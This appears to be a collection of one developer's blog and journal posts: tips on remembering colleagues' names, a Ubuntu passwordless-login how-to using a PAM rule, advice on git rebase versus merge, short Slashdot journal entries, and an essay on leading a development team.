title: "article: micro$oft battles for survival of office"
date: 2005-11-10
slashdot_url: https://slashdot.org/journal/121807/article-microoft-battles-for-survival-of-office
---
<p>Microsoft is in real danger of losing its office monopoly, which is currently perpetuated by the "I need office to send files to so and so" argument.</p>
<p><a href="http://searchopensource.techtarget.com/originalContent/0,289142,sid39_gci1144104,00.html">http://searchopensource.techtarget.com/originalContent/0,289142,sid39_gci1144104,00.html</a></p>
<file_sep>---
title: Tips for remembering names
layout: post
---
## The Tips
### Tip #1
📝 When being introduced to everyone in an office, take the time to make a quick note in a notepad. Name + role.
- 👹Fear: not making eye contact, being rude.
- 😇 Reality: people really appreciate that you care enough about them to make the extra effort.
### Tip #2
Use their name immediately.
"Hi Angela!"
### Tip #3
Pair them mentally with someone you know with the same name, perhaps someone famous. Imagine them stood together.
Any kind of visual image that helps you jump from face to name no matter how silly.
### Tip #4
Make an effort to get the pronunciation *precisely* right, especially with names from languages with sounds that don't exist in your native tongue.
People appreciate that you actually want to get it right and it's an excuse to repeat it lots while looking at their face.
### Tip #5
Attempt to use their name when you see them next.
Swallow your fear of looking like an idiot / being uncaring.
There's nothing like the horror and embarrassment of being corrected bluntly to sear the right name into your reptilian brain.
I did this twice yesterday 🙊🙈, sorry!
### Tip #6
Mentally rehearse and reinforce the name-to-face pairing both ways.
Name -> face (or distinguishing features)
Face -> Name + role + interests
### Tip #7
Practice recall over time:
- immediately (oh hi Ishmel)
- In 5 mins (hmm so Heather is a coder from 1st floor)
- 10 mins
- half hour
- 2 hours
- 6 hrs
- 1 day
- 2 days
- 4 days
- 1 week
- etc
### Tip #8
Chat to them on teams / slack / email etc where the tech shows full names and hopefully profile pics too.
### Tip #9
Try and recall, when you can't then refer to your list of names from the office intros.
### Tip #10
When a new name pops up add it to your physical notebook with a person symbol in the margin so you can scan for them.
### Tip #11
Put them in your phone address book, use tags and notes to associate them with where you met them (neighbour, job at X, works at Y)
### Tip #12
Take the time to rewrite your rough list of names into a tidier and organised list.
### Tip #13
Go and coffee with them individually and learn about them, their history and what excites them.
It turns them into a human with depth and feelings in your brain instead of a lifeless fact to remember.
### Tip #14
Ask the group in a meeting if they wouldn't mind starting with a round of intros. (Or ask the meeting organiser / chair to include that.)
Make notes when they do. None of us can remember 15 names & faces in one go.
Don't be afraid to interrupt if you miss one, it shows caring.
### Tip #15
Use *any* excuse to use people's names
- when they are there
- without them
- with others
- privately
- verbally
- in writing
### Tip #16
Ignore your fear of getting their name wrong.
Better to try, fail and improve than to be stuck not knowing. Time heals all.
### Tip #17
Don't be afraid to screw up names more than once.
Most people can empathise and are also afraid.
### Tip #18
Show empathy by repeating your own name to help them learn without fear.
### Tip #19
Visibly lead by example by using names a lot with others - to help everyone learn new names.
Hopefully others will follow suit. (I'm not sure this actually works, let me know!)
### Tip #20
Don't be afraid to actually *look* directly at their face and the rest of them.
It's hard to remember a face that you haven't actually seen.
Sometimes there's social dynamics that make it *really* hard to look someone in the face.
## My journey to better
I too was terrified of this. I just quietly held the shame & failure of not knowing names I'd been told. Memory isn't my forté.
One day I just thought why am I avoiding this, all I can do is try and be better. So from then on I resolved to put my fears aside and just do my best.
As a contract coder who has to learn 40+ new names on a regular basis this has been a huge improvement for me, and I continue to both fail and improve.
I have zero regrets for taking the risk and trying to be better, including the many many failures.
The best thing about deciding to try harder is that even if I utterly fail remembering someone's name it's really obvious that they really appreciate the fact that I'm trying, that I care enough about them to want to know who they are and treat them as a real person, and that I take the time to learn more about them than just an email address.
I've accepted that my human brain only has limited ability and I'm sorry to say I've forgotten hundreds, maybe thousands of names in my 22 years of work.
We all have these limitations to a greater or lesser extent, so when I fail I get empathy and usually a correction. Not one person has expressed annoyance with me.
I still value and honour my time with all those people, whether I remember names or not.
## What about you?
How do you approach remembering names?
Do you risk it or do you avoid it altogether?
What tips and experiences can you share?
## Sleepless nights
This post started as a [series of tweets](https://twitter.com/tim_abell/status/1527109721429315586) when I woke up in the small hours thinking about it. Do add your thoughts there if you're a twitter kinda person.
<file_sep>---
layout: post
title: password-free ubuntu login with facebrowser
date: '2008-12-18T21:27:00.002Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
modified_time: '2009-04-04T00:31:35.019Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7416804086430204798
blogger_orig_url: https://timwise.blogspot.com/2008/12/password-free-ubuntu-login-with.html
---
If you trust everyone who has physical access to a pc (if not then you are
encrypting your files, right?) then there seems little point in having to type
a password just because more than one user uses the pc.
So here's how to log in from the gdm "face browser" with a single click.
Instructions tested with Ubuntu 8.04 Hardy Heron and 8.10 Intrepid Ibex.
As root, create a new file containing the usernames of all the users you want
to be able to log in through gdm without entering a password:
sudo -i
echo 'username' >> /etc/gdm/nopassusers
now still as root modify the pam settings for gdm to check this file and allow this user in based on being in the list:
vi /etc/pam.d/gdm
and modify to contain the new listfile item
#%PAM-1.0
auth requisite pam_nologin.so
auth required pam_env.so readenv=1
auth required pam_env.so readenv=1 envfile=/etc/default/locale
**auth sufficient pam_listfile.so item=user sense=allow file=/etc/gdm/nopassusers onerr=fail** #add this line
@include common-auth
auth optional pam_gnome_keyring.so
@include common-account
session required pam_limits.so
@include common-session
session optional pam_gnome_keyring.so auto_start
@include common-password
now simply restart gdm (or the whole machine) and try your new one-click login
/etc/init.d/gdm restart
# Notes
This means the keyring isn't unlocked, so you may have to type in your password anyway before your wireless connects.
# References
* [http://mirror.hamakor.org.il/archives/linux-il/05-2004/10149.html](http://mirror.hamakor.org.il/archives/linux-il/05-2004/10149.html)
* [http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/sag-pam_listfile.html](http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/sag-pam_listfile.html)
<file_sep>---
title: "microsoft office clipart"
date: 2005-09-06
slashdot_url: https://slashdot.org/journal/116467/microsoft-office-clipart
---
<p>take a look at <a href="http://office.microsoft.com/clipart/preview.aspx?AssetID=MMj0309727&Query=j0309727&Scope=MC,MM,MP,MS&CTT=1&Origin=EC790000121033&QueryID=p918HLJml&AssetCol=MMj0309727">this clipart preview</a>.</p>
<p>Don't know why it's interesting (cough), b3ta.com pointed it out.</p>
<file_sep>---
title: Should you rebase or merge to update feature branches in git?
layout: post
---
You have a "feature branch" in git that you've been working on for a while but
now `main` or `master` has moved on. You know of `merge` and `rebase`, but
which one should you use? And what can you do to avoid being in this position
in the first-place?
## TLDR
Try rebase. If that dissolves into conflict-resolution-hell then give up, merge
master into your branch and move on.
## The Options
You need to bring your feature branch up to date with master to flush
out any incompatibilities and deal with any merge conflicts.
You have two common choices:
* **Merge** `origin/master` into your branch.
* **Rebase** your branch onto `origin/master` and force-push.
## The Trade-offs
A blanket rule here either for merge or rebase is unhelpful because there are
**trade-offs** to be made that vary depending on the specific circumstances. (Isn't
that always the answer with git?! "It depends!")
### Should You Merge?
A merge from `master` is done like this:
```
git fetch
git merge origin/master
git push
```
#### Merge - The Good
* 👍 Reliable no-brainer that anyone can follow by rote.
* 👍 Resolve conflicts only once.
* 👍 Accurate representation of what happened over time.
* 👍 Avoids retrospectively [introducing bugs and test failures into commits that
used to be
valid](https://medium.com/@fredrikmorken/why-you-should-stop-using-git-rebase-5552bee4fed1).
* 👍 Avoids re-writing previously shared branch, which can confuse less
experienced git users if they are working with you on the branch.
#### Merge - The Bad
* 👎 Doing this repeatedly makes for a messy history for little or no benefit.
* 👎 Significant merges from master makes it harder/impossible to then go back and
clean your branch's commits with a `git rebase --interactive`.
* 👎 Tends to generate [wide tramlines in the commit
history](https://hackernoon.com/git-merge-vs-rebase-whats-the-diff-76413c117333)
that can be very hard to follow when looking back to find out when/why
something was done. (mitigated by `git log --first-parent`, until
you need to dig into a branch).
### Should You Rebase?
A rebase onto master is done like this:
```
git fetch
git rebase origin/master
git push --force-with-lease
```
#### Rebase - The Good
* 👍 Avoids tramlines generated by long-lived feature branches
* 👍 Makes resultant history in `master` much easier to follow
* 👍 Reflects the intention more clearly of "merge these commits into master" as
opposed to "here's how I flailed my way to a working thing"
#### Rebase - The Bad
* 👎 Can confuse less experienced git users if they are working with you on the
branch (the answer is usually for them to run `git pull --rebase`)
* 👎 Results in [resolving conflicts multiple times (screencast)](https://youtu.be/5b-vNpSw6R8)
* 👎 Loses chronological order of creation of code (personally I think this is
less important than a series of clean intentional patches to be applied to
the codebase when merged to `master`)
* 👎 Could in somewhat rare circumstances retrospectively [introduce bugs and test
failures into commits that used to be
valid](https://medium.com/@fredrikmorken/why-you-should-stop-using-git-rebase-5552bee4fed1)
## Heuristics To Use
Try rebase. If that dissolves into conflict-resolution-hell then give up, merge
master into your branch and move on.
> "Try rebase. If that dissolves into conflict-resolution-hell then give up,
> merge master into your branch and move on."
>
> ~ <NAME>
>
> [Tweet this](https://twitter.com/intent/tweet?text=%E2%80%9CTry%20rebase.%20If%20that%20dissolves%20into%20conflict-resolution-hell%20then%20give%20up%2C%20merge%20master%20into%20your%20branch%20and%20move%20on.%E2%80%9D%20~%20%40timabell%20%F0%9F%91%89%20https%3A%2F%2Ftimwise.co.uk%2F2019%2F10%2F14%2Fmerge-vs-rebase)
Rebase is my preferred approach until:
* Rebase becomes too costly to fix up due to conflicts with `master`, or
* I become aware of an incompatibility with `master` that changes the meaning
of the previous commits and needs serious work to resolve.
You *can* usually make a difficult rebase work, and I've hunkered down and
tackled probably more than I should have in the name of perfect history graphs.
The problem with a tricky rebase is that if you are doing this for business and
not just for fun then there is a major time cost for only a marginal benefit.
## How to make it through rebase conflicts unscathed
If you decide to battle on with rebase in-spite of conflicts then my tip for
you is:
Don't jump straight to the "correct" code when fixing each commit's conflict,
as that guarantees the next commit won't apply.
Instead as you work through the rebase make each commit apply with its original
meaning and nothing more.
It's worth remembering that each commit on your branch describes how to change
the source code from a before-state to an after-state; so if you change the
after-state of one patch, then the next patch will no longer apply.
## How to avoid the pain of rebases and merges entirely
Pain around this topic is likely a symptom of not breaking down your stories /
pull requests / features into small enough chunks. On a fast moving team
`master` is very fluid and any large & long-running branches will be hard to
review and merge. Try to chip off smaller increments and ship those, maybe
using feature flags or hidden features (those with no visible way of getting to
them).
## More Resources
In general merge vs rebase generates much debate, such as that found on
stackoverflow:
<https://stackoverflow.com/questions/804115/when-do-you-use-git-rebase-instead-of-git-merge>
but it is often lacking context.
There are many other articles on the merge/rebase topic such as
<https://derekgourlay.com/blog/git-when-to-merge-vs-when-to-rebase/> but I
couldn't see anything that matched my heuristic for tackling feature branch
updates so I wrote this one.
"[Semantic merge conflicts](https://bors.tech/essay/2017/02/02/pitch/)" are where git reports no conflict but nonetheless the code is broken.
I also wrote "[GitHub rebase and squash considered harmful](/2021/03/15/github-rebase-and-squash-considered-harmful/)" which address a github specific horror.
## Get in touch
Hey there! Thanks for reading!
This post gets far more traffic than anything else on my blog. I'd love to know what brought you here and if the above was helpful.
Please take a moment to fire an email to me at [<EMAIL>](mailto:<EMAIL>?subject=merge-rebase-article) and tell me a bit about yourself.
<file_sep>---
title: "more raucous laughter"
date: 2005-05-17
slashdot_url: https://slashdot.org/journal/107007/more-raucous-laughter
---
<p><a href="http://www.turnoffyourtv.com/international/bbc.havealifead.jpg">http://www.turnoffyourtv.com/international/bbc.havealifead.jpg</a></p>
<p>my sentiments precisely</p>
<file_sep>---
title: "bluetooth headset & old pc with new cable modem"
date: 2003-11-22
slashdot_url: https://slashdot.org/journal/52940/bluetooth-headset-old-pc-with-new-cable-modem
---
<p>Hello my loyal fanbase. (of me reading my own journal - hello me).</p>
<p>Voice dialling seems to be working on my headset now. Woo. Still not sure it's acting quite how it should.</p>
<p>Fixed internet connection on my P800. Turned off secure thingy in the connection settings. All started working again. (Wonder if that's bad?)<br>Used about 1/4 Mb today, but thanks to fone tariff obfuscation I have no idea what that cost me.</p>
<p>the old pc....<br>A's got cable installed now. How do I download a firewall? I connect the unprotected pc to the internet! Aarggh. Stressful. Getting there now.<br>Should have brought my install disks with me. Never mind.</p>
<p>T.</p>
<file_sep>---
title: Being a development team lead
layout: post
---
Here's my take on what it means to be a dev-lead / tech-lead / lead developer; and why it's time I stepped up.
I'm going to explain what I think makes for a really good high-functioning dev team, and how to get there along with links to essential reading on the subject.
As always contributions and thoughts welcome, drop me a line. If you want me to help with your team just shout. I love to just chat with people about their challenges in digital delivery, whether or not I end up becoming part of the project.
I'm also going to say why I think it's time I shifted *my* contracting focus from individual contributor to being a lead dev for teams.
## How to be an excellent lead dev
Having worked under many team leaders of all types I have a pretty good idea of what's pleasant and effective. And I'm glad to say that being a nice human being to be around is a big part of being a great leader. Dictatorial, unpleasant and command-and-control leadership are just not the right tool for running complex digital delivery projects.
### Servant-leader
The best leaders I've come across are almost deceptively non-leader-like. This is because our culture in the west (hello press, television and film) portrays "leaders" as hard-ass bullies who get the best out of an organisation by ordering people around, knowing all the answers like some kind of god and generally being unpleasant. The reality is that the best leaders don't lead by intimidation, they lead by example, lead by being humble, lead by coaching (see below) and know that relationships and trust are what really matter for teams that can ship and respond to problems.
### Culture of trust
Everyone in the team is doing the best they can with the knowledge and circumstances they have. We can all help each other get better with trust and a good dose of [nonviolent communication](https://www.amazon.co.uk/Nonviolent-Communication-Marshall-Rosenberg/dp/1591791707).
### Openness with all
[Make things open: it makes things better](https://www.gov.uk/guidance/government-design-principles#make-things-open-it-makes-things-better).
I've always thought it best that anyone in the organisation who is interested can see every last detail of what we're working on, right down to the code. This does of course require a culture of trust, but if that's missing there are deeper problems to be solved.
There are of course some things that need to be protected such as production keys and the personal data of users.
As an example I ran an end-of-sprint demo for a client with all the major stakeholders present for an important project. The demo consisted of a "red screen of death", which showed that we had been unable to get a particular piece of technology with which the team was unfamiliar to work even after a whole sprint on it. Once the shock of the blunt honesty subsided the senior stakeholders were able to see that something needed to be done to ensure success and helped us recruit an external consultant with expertise in that particular technology. From there on things went much more smoothly. If we hadn't demoed our "failure" then there was a real risk that the senior stakeholders would have mistakenly thought everything was fine and no action was needed, which would likely have resulted in a complete failure of the project to deliver. Some people seem to like to always paint a positive picture to their seniors (the RAG reports that are always yellow until it's too late to fix anything and they finally all go red, as the people go and get new jobs elsewhere...).
### Setting the standards
Nobody wants bugs, unmaintainable spaghetti code, regressions due to missing test coverage. But how do you achieve this in a collaborative positive way? Just demanding it be so is ineffective and builds resentment.
No team is perfect. No software is perfect. There is only "better", "worse" and different tradeoffs between different pressures on system design and human behaviour. So we should strive for the best, bring the team with us, and accept that we are all flawed human beings with an inability to simultaneously keep in our heads every constraint and piece of the system. In fact software is largely written and architected the way it is *because* even the best human brains have limited capacity for knowledge of a system. Managing complexity and coping gracefully with humans being human is an important part of the puzzle.
I see the push towards today and tomorrow's "best practice" more as giving permission to the team to strive for it than enforcing. Most developers I know want to be and do the absolute best they can. When team output doesn't meet some criteria (such as test coverage) these are some possible reasons that I'd look at. I'd use the ordering below so that we can assume good faith until proven wrong. I definitely wouldn't start with confrontation or accusation. Assuming the best does not mean giving up powers of last resort should all other options be exhausted, but that would be the last option. Filtering for great people on the way in is much better than undoing poor selection once the team is up and running.
1. What pressures are being placed on a contributor to behave a particular way, where is that coming from? E.g. is a delivery manager pushing for raw speed and that being interpreted as a need to skip test coverage and just ship bare production code. In that case perhaps some conversations about the tradeoffs being invisibly made are all that it would take, and some defense of the fundamentals that drive the need for "best practice" in the first place (e.g. regression-proofing to allow continuous delivery, and confidence in refactoring to support agility and ongoing quality, see also [XP](https://en.wikipedia.org/wiki/Extreme_programming))
2. Is there a lack of knowledge as to why this good practice is beneficial to the project? If so some mentoring and coaching might be in order. Maybe as part of some pair programming exercises.
3. Provide formal training (perhaps Pluralsight courses) to fill in the knowledge gaps. Particularly for permanent employees. For contractors perhaps a suggestion of courses they could take to level-up.
4. Communicating to those involved in line management / supplier management the concerns with not meeting the standards the rest of the team are able to achieve. Discussing additional ways of providing support to enable the individual to level-up.
5. Finally, and this is not a preferred option due to the disruption it causes, make the call to put someone on a formal improvement plan or move them on.
#### The coaching ladder
Inspired by [Developing Leadership podcast episode 19 about a strong engineering leadership culture](https://www.developingleadership.co/episode/episode-19-transitioning-from-a-holacracy-to-a-strong-engineering-leadership-culture-with-katie-wilde-from-ambassador-labs#).
Different people, cultures and neurological wiring need different ways of setting out expectations. A two-pronged approach of gentle coaching + clear expectation & consequence setting seems to cover all bases.
1. Listening mode - make sure people are heard in groups and one-on-one
2. Gently coach expectations - "have you thought about doing x?" / "I observe that your PR descriptions average 10 words" / "here's how writing clear PR descriptions helps your valuable ideas be recognised by the team"
3. Set out consequences of not meeting expectations - "We require excellent communication in pull requests to the standard of [example]" / "this standard is a requirement of continuing to be a senior engineer here"
#### One-minute manager
Where course correction is needed (when operating more as a line-manager) [The (new) One Minute Manager](https://www.amazon.co.uk/New-One-Minute-Manager/dp/0008128049) offers some great advice on keeping it simple and clear for all involved. This suggests that one-to-one interactions take the form of:
1. One-minute on goals
2. One-minute on praise
3. One-minute on redirection
If doing only three minutes of this means they can be done more often and more reliably with the whole team this is a win, as often the opportunity for this kind of discussion is lacking due to the pressure to ship. It's important to note that this doesn't mean the relationship has reverted to command and control, only that clear expectations are important for everyone's success and happiness.
### Current "Best Practice" and Lofty Goals
Things we should strive towards doing/having.
* Great test coverage
* 100% unit test coverage (in meaning not just in line count)
* Why? Because this enables refactoring with confidence, reduces the chance of regressions and encourages good design (e.g. decoupling, SOLID etc.)
* Use TDD (Test-Driven Development)... if it's the right tool for the job. TDD is a useful technique to be sure. It's harder to use when you can't picture the shape of what you are going to create in your head in advance which I think is probably its biggest weakness. The ultimate objective is that it should be impossible to change the intended behaviour of a production code without a test failing. TDD helps with this but isn't the only way. Another way is to alter the behaviour temporarily (locally) after the code is written and make sure the tests do actually fail. So long as the output coverage is good then I don't personally think that being religious about TDD is especially helpful. I think it's a technique that all developers should learn and practice, whether or not they use it for every piece of code they write.
* Smoke tests
* Some kind of end-to-end "did we break anything critical" that runs on real infrastructure. This usually requires dedicated effort to create beyond the tests created during individual feature work. I recommend putting this in the backlog and ensuring it is scheduled as it's too big for a hero-developer to "just do" unless you've completely lost control.
* [Visual regression testing](https://www.browserstack.com/guide/visual-regression-testing) - in anything with a UI this can catch regressions and unintentional changes that would be hard to catch.
* ["BDD" (Behaviour Driven Development) aka specification by example](https://www.agilealliance.org/glossary/bdd/)
* A tool for a job. Use it where it's useful such as allowing business analysts to create and validate example scenarios for complex calculations or flows. Beware of the overhead of example wiring code.
* Often confused with UI tests due to coincidental timing of creation with browser-automation. BDD is not the same as UI testing, mkay?
* The point of BDD is more that it's a user/business need focussed description of what the software is supposed to do that's then made executable through a translation layer. Do not forget this.
* You can get a lot of the benefit of BDD by [just writing test method names in the BDD style](https://www.futurelearn.com/info/blog/how-we-write-readable-feature-tests-with-rspec), such as `def the_order_total_should_be(total_price)` and then chaining them together in a top level "scenario" method just like you would with gherkin but without all the example parsing overhead.
* Continuous delivery (and confidence to ship any time without even looking)
* [Lights-Out delivery](https://sdtimes.com/devops/going-lights-out-with-devops/) - i.e. never having to manually interact with production servers. Related to configuration-as-code etc.
* Use feature flags (related to the true meaning of the oft misused phrase "continuous integration") to avoid long-lived feature branches for things you can't release to the users yet.
* Use the best type of project management (yes I used the dirty words!) for *your* project.
* Agility:
* Methodologies are fine, but the point is to be able to be responsive to changing knowledge and business requirements. Never forget that.
* [eXtreme Programming](http://www.extremeprogramming.org/) - an important piece of the landscape, with a focus on technical approaches that allow agility (always shippable, fully tested, etc.)
* [Scrum](https://www.scrum.org/resources/what-is-scrum/) - a good basis for all projects, especially greenfield development
* Kanban - better for maintenance mode projects
* It's very important to understand "Work In Progress (WIP) limits" regardless of whether you use kanban or not. [This video explains wip limits](https://youtu.be/W92wG-HW8gg) in a way that is easily understandable. The mathematical truth of wip limits will always be counter-intuitive to my monkey-brain I think. In short, throughput matters more than utilisation of each person/resource.
* Lean
* [Flow](https://flowacademy.io/what-is-flow/)
* [Scaled Agile (SAFe)](https://www.scaledagileframework.com/) for multi-team agile
* ShapeUp from basecamp is inspirational. It's a refreshing change from scrum. I wrote [a summary of ShapeUp](/2019/11/26/time-to-shape-up-your-scrum-process-the-new-thing-from-basecamp/) which, in my humble opinion, is worth a read.
* Waterfall is bad. Period. Gantt charts are to be treated with suspicion, along with anyone and anything else that promises complete predictability of software development.
* Self-directed teams that own their results and can use appropriate methods for their particular challenges are far more effective than standardization.
* Personally I like some kind of blend of scrum and kanban, and definitely no story pointing.
* Lightweight agile governance:
* Stakeholders showing up to sprint demos (show-n-tell) is much more time-efficient and more powerful than written reports.
* Ability to rebuild entire estate from source-control:
* Binaries
* Infrastructure (configuration-as-code)
* DevOps in practice not just in name (the development team **owning** production)
* This implies a diversity of skills within the "development" team.
* Assistance from people with expertise outside the team is of course welcome, but the important thing is the team continues to own their own outcomes.
* Some (but not complete) harmonization of technology choices:
* Largely consistent technology makes hiring and moving around projects easier
* Completely consistent technology prevents using the best tool for the job
* Following [12 factor principles](https://12factor.net/).
* Pushing beyond the original 12 factor principles - [Small Batches podcast episode 7](https://smallbatches.fm/7/)
* Continuous improvement (of the team, the processes and the system being built)
* Pair/mob programming.
* Collaborating on just about everything ensures no-one is a single point of knowledge for any one thing.
* The sharing of knowledge, skills and techniques improves everyone's skills as we go.
* Many problems and bugs are caught even before `git add` has been run. The later a problem is found the more it costs to rectify it.
### Estimates
*Story points, t-shirt sizes, predictions, time-based estimates and no-estimates.*
This is a topic that always causes heated debate with lots of dogma on all sides. Experiences of day-long point-guessing sessions leave developers who just want to ship nervous of anyone who mentions the word estimate or point. Project owners/managers get nervous when they have no idea how much they are about to spend. Deadlines can be real or made up. Cost/benefit decisions have to be made. So what should we do?
I say it depends. And more usefully, **only create estimates if you can prove you need them**, and then use the most lightweight way you can come up with of getting just enough information to make a call and go back to cutting code.
Creating estimates has a cost, make sure you know you need it otherwise don't pay the price. Kanban calls this "[waste](https://kanbanize.com/lean-management/value-waste/7-wastes-of-lean)" (i.e. anything that doesn't end up in the final product, which definitely includes estimation work).
[Avoid story points](https://ronjeffries.com/articles/019-01ff/story-points/Index.html) - they were basically invented as a way to prevent people mistaking **estimates** for **commitments** but have taken on a horrifying life of their own. I have *never* seen them be particularly useful in any of the many projects I've been on, and I have regularly seen them be a big cause of pain, wasted time and discontentment.
Genuine reasons for needing some kind of estimate:
* Big-feature prioritization - use t-shirt sizes (small, medium, large, elephant)
* Can't miss deadline (I arrived on a project when the release date of a non-existent thing had already been announced by the managing director to all the customers). Do as few of the following as you can: (listed in increasing order of cost and decreasing order of preference.)
* A "finger in the air" hunch for viability of the project from an experienced engineer
* Consider just doing the minimum viable product (MVP) first and then adding nice to haves once that's done (iterate). Focus on always-shippable.
* If you are concerned even the smallest viable thing might not be doable then you might have to create some architecture designs and prototypes up-front to reduce risk of discovering complications later.
* If time is tight and even the MVP is looking uncertain then you might have to create actual estimates for more detailed tasks to give you a better idea of the options ahead of you. I have actually done this on a fixed-deadline project. It's time consuming and dangerously waterfall but it might be your only choice. The more granular the task list the more accurate the estimate (it helps compensate for human bias), but on the flip side the more detail you create without building the more likely you are to be wrong about the design and tasks and for it all to be a waste.
Planning releases - do you *really* need to do this given the cost? Consider using feature-flags instead to hold back features if you need to time their release.
If you need to forecast based on points [use monte-carlo story-point forecasting as implemented by <NAME>](https://christopher-bimson.github.io/blog/2017/04/19/forecaster). While I like this approach I'd challenge the need for the forecasts in the first place before committing to the significant extra overhead of calculating and tracking points and then turning that into forecast.
### Staying sharp
Even though I accidentally led a couple of teams early in my contracting career I didn't at that point fancy moving "up" the ladder. I had seen people become "dev team managers" and rapidly lose all their technical skills through a combination of atrophy and the never-ending churn in state-of-the-art technology and practice. I certainly didn't want to end up as a mediocre manager with mediocre and outdated tech skills. So I put my head down and kept on coding as an "individual contributor" (sometimes referred to as an I.C.). Since then I've learned and seen some tricks that I think can allow people to stay sharp no matter how high they climb.
#### The pendulum
By alternating roles you take on between individual contributor (coder) and team lead roles you can keep the experience of coal-face high-pace shipping fresh whilst also giving more value by helping whole teams succeed.
<https://charity.wtf/2017/05/11/the-engineer-manager-pendulum/>
#### The non-critical-path task
I tried picking up a story from the sprint when I was leading a team once. It didn't go well but I didn't know any better. Because my primary goal was team enablement and my time was interrupt-driven I'd end up with the team waiting for my piece to get done. Not a great help to the team's delivery speed. I also found with the team being full time on code and me less than full time I was always just that little bit behind on current thinking in the heart of the codebase, and you don't have to be much out of step to be much less productive or cause more problems than you solve.
Since then I've seen two great approaches implemented by others:
1. Take on a non-critical but useful coding piece that won't block the team. I watched an amazing product owner (who can also code) build an entire support console microservice while us devs built the main production app. This gave huge benefit of allowing the support folks and BAs to self-serve on things we didn't have time to build to production grade. It kept him close to the actual product. It also kept his Ruby on Rails skills current and sharp. Ace. I shall be copying this trick!
2. Work on enablement pieces. Make sure CI pipelines are flowing well. Do version upgrades. Tackle bugs that haven't made the team's sprint. I've seen a team lead do this effectively and would recommend.
### Interviewing / filtering
Not everyone gets this luxury but being allowed to control who works in your team will do more for your ability to succeed than anything else.
For a phone screen I wrote up my process here: [Technical phone screen interview questions](/2021/12/10/technical-phone-screen-interview-questions/).
Beyond a quick phone/video screen my favourite approach is a pair-programming exercise as this is such a rich source of information and matches how we actually get things done.
### Coaching & mentoring
I can't say it better than [The Coaching Habit by <NAME>](https://www.amazon.co.uk/Coaching-Habit-Less-Change-Forever/dp/B01HH7IZCI). The follow-up book [The Advice Trap](https://www.amazon.co.uk/How-Tame-Your-Advice-Monster/dp/1989025757) is also excellent.
I've often been guilty of unloading all my "knowledge" on others before they've even asked. Now I see the error of my ways and instead as per the book look to nudge and help at people's own pace. Being there to assist and give confidence as needed; leading people to the best answer through questions instead of answers (and being happy to be surprised that it's a better answer than I had in mind).
### Decision making
It's good to have single points of responsibility such as a tech lead or project owner, however that doesn't mean that it's top down control.
As for how to make the best decisions in chaos and complexity, or when thinking seems to have narrowed to group-think this is an excellent guide: [Decisive: How to Make Better Choices in Life and Work by Chip & Dan Heath](https://www.amazon.co.uk/Decisive-Make-Better-Choices-Life/dp/0307956393)
### Things to read / watch / listen to
* Blog posts
* [Maker's Schedule, Manager's Schedule by Paul Graham](http://paulgraham.com/makersschedule.html)
* [Being Glue post/talk by <NAME>](https://noidea.dog/glue)
* [Command and Conquer and the Herd of Coconuts by <NAME>](https://www.joelonsoftware.com/2000/03/23/command-and-conquer-and-the-herd-of-coconuts/)
* [Normalization of deviance by <NAME>](https://danluu.com/wat/)
* Tech leadership books
* [Notes to a Software Team Leader: Growing Self Organizing Teams by <NAME>](https://www.amazon.co.uk/Notes-Software-Team-Leader-Organizing/dp/829993320X)
* General leadership & communication books
* [The Advice Trap: Be Humble, Stay Curious & Change the Way You Lead Forever by <NAME>](https://www.amazon.co.uk/Advice-Trap-Humble-Curious-Forever-ebook/dp/B083YZTW4B)
* [5 Dysfunctions of a Team](https://www.audible.co.uk/pd/The-Five-Dysfunctions-of-a-Team-Audiobook/B004EXKC5M)
* [The First 90 Days](https://www.audible.co.uk/pd/The-First-90-Days-Updated-and-Expanded-Audiobook/B00CDW0EX6)
* Personal development (you'll need this for you and your team!)
* [Daring Greatly by <NAME>](https://www.amazon.co.uk/Daring-Greatly-Courage-Vulnerable-Transforms-ebook/dp/B00APRW2WC)
* [Nonviolent Communication; <NAME>](https://www.amazon.co.uk/Nonviolent-Communication-Create-Relationships-Harmony/dp/B00TIWFAV0/)
* [Bonds That Make Us Free; <NAME>](https://www.amazon.co.uk/Bonds-That-Make-Free-Relationships/dp/B07N149VZK/)
* [48 Laws of Power; <NAME>](https://www.amazon.co.uk/48-Laws-of-Power/dp/B00WYRC0L4/)
* Lean / Flow / Kanban agile etc
* [The Goal: A Process of Ongoing Improvement Kindle Edition
by <NAME>](https://www.amazon.co.uk/Goal-Process-Ongoing-Improvement-ebook/dp/B002LHRM2O) (Audible version has sound effects and everything!)
* [WIP: why limiting work in progress makes sense (Kanban) (YouTube)](https://www.youtube.com/watch?v=W92wG-HW8gg)
(Personally I like Audible books, I think it sinks in better being told the stories by another human voice)
### Who to learn from
* The legend of [<NAME>](https://www.joelonsoftware.com/) - I've been reading his articles since I first started coding. Remember "[the joel test](https://www.joelonsoftware.com/2000/08/09/the-joel-test-12-steps-to-better-code/)"?
## Other ways of moving "up"
These days thankfully moving into management isn't the only way to get a pay raise in many organisations. Places have recognised that getting ever deeper into technology is in itself valuable, spawning titles such as "principal engineer" that carry the weight and remuneration to match the value and experience of a coder who has seen many things and developed many other skills beyond pure coding.
There's also the "architect" route where you can be an expert in deciding what to use and how to put it together from the seemingly infinite choice of technical solutions, patterns, services and infrastructure that will solve pretty much any given problem. There's good money to be made being an architect, if nothing else than because your power to royally screw everything up for everyone that comes after you is probably about as high as it gets in this role! (Yes I've been on the receiving end of good and bad "architecture").
The road to CTO. You can join a small startup and ride the explosive growth, ending up with many engineers and services under your control. Or you can work your way up relentlessly in one or more large organisations.
## Me, a leader?
### Why me, why now, why this?
I'd like to build a product, but I can't just stop contracting and hope for the best. As such I've spent some time considering which direction I should take my contractor life.
When considering changes of career direction I highly recommend [the book "Working Identity" by <NAME>](https://www.amazon.co.uk/Working-Identity-Unconventional-Strategies-Reinventing-ebook/dp/B004OEIQ7C) which lays out a framework for thinking about the journey of the change, combined with lots of research and stories of others who've faced the chasm (often but not exclusively in the traditional mid-life point).
Here's some ideas that popped up ("identities to try on" in the terminology of the book):
* **Systems-integration agency/consultancy** - I had a go at this but seems to be too big a jump for me right now, on the plus side it's kicked off another period of learning and self-development for me and is the reason I hired a [business coach](https://businesscoachdirectory.com/coaches/) which I am eternally grateful for.
